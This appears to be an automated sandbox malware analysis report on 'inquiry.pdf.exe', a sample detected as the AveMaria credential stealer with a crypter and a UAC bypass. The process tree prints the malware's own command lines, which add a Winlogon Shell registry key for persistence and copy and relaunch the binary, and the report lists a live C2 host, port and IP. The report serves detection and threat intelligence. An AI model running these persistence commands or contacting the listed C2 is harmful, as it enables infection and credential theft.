Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inquiry.pdf.exe

Overview

General Information

Sample Name:inquiry.pdf.exe
Analysis ID:715157
MD5:6236e43da1b2c6279760e6b2b7e2d40f
SHA1:a24221417ff9c0d169bf17b7f242824fe61d3b72
SHA256:b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
Tags:exe
Infos:

Detection

AveMaria, DarkTortilla, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected DarkTortilla Crypter
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • inquiry.pdf.exe (PID: 5896 cmdline: C:\Users\user\Desktop\inquiry.pdf.exe MD5: 6236E43DA1B2C6279760E6B2B7E2D40F)
    • cmd.exe (PID: 2148 cmdline: cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 612 cmdline: ping 127.0.0.1 -n 7 MD5: 70C24A306F768936563ABDADB9CA9108)
      • reg.exe (PID: 4684 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe," MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • cmd.exe (PID: 3272 cmdline: cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 636 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
      • PING.EXE (PID: 5244 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
      • glonkjhg.exe (PID: 4760 cmdline: C:\Users\user\AppData\Roaming\glonkjhg.exe MD5: 6236E43DA1B2C6279760E6B2B7E2D40F)
        • AddInProcess32.exe (PID: 2400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
        • AddInProcess32.exe (PID: 1916 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
        • jhFFFffkl.exe (PID: 4896 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • jhFFFffkl.exe (PID: 6060 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
        • jhFFFffkl.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • jhFFFffkl.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "hannoyputa.giize.com", "port": 3027}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1f48:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1f48:$c1: Elevation:Administrator!new:
    00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 56 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.inquiry.pdf.exe.3b9a2b2.5.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          0.2.inquiry.pdf.exe.3c6b362.7.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            20.3.AddInProcess32.exe.ea6d50.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0x5f8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            20.3.AddInProcess32.exe.ea6d50.0.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0x5f8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            • 0x5f8:$c1: Elevation:Administrator!new:
            20.3.AddInProcess32.exe.ea6d50.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3b40:$a1: \Opera Software\Opera Stable\Login Data
            • 0x3e68:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x36f0:$a3: \Google\Chrome\User Data\Default\Login Data
            Click to see the 222 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: inquiry.pdf.exeReversingLabs: Detection: 39%
            Antivirus / Scanner detection for submitted sample
            Source: inquiry.pdf.exeAvira: detected
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Multi AV Scanner detection for domain / URL
            Source: hannoyputa.giize.comVirustotal: Detection: 5%Perma Link
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeAvira: detection malicious, Label: HEUR/AGEN.1251650
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeAvira: detection malicious, Label: TR/Agent.able
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeReversingLabs: Detection: 39%
            Machine Learning detection for sample
            Source: inquiry.pdf.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeJoe Sandbox ML: detected
            Source: 19.0.AddInProcess32.exe.900000.0.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "hannoyputa.giize.com", "port": 3027}

            Exploits

            barindex
            Yara detected UACMe UAC Bypass tool
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR
            Source: inquiry.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: inquiry.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 4x nop then mov ecx, 6B3AC8CCh
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 4x nop then mov ecx, 6B4AC8CCh
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 4x nop then add dword ptr [ebp-20h], 01h

            Networking

            barindex
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: hannoyputa.giize.com
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-NYC-11US LEASEWEB-USA-NYC-11US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 23.105.131.206 23.105.131.206
            Source: global trafficTCP traffic: 192.168.2.3:49706 -> 23.105.131.206:3027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1Imt
            Source: glonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/gImt
            Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobjImt
            Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comIta
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comers
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comgo
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comintTV
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comize
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.commbe
            Source: inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.(
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
            Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-uO
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
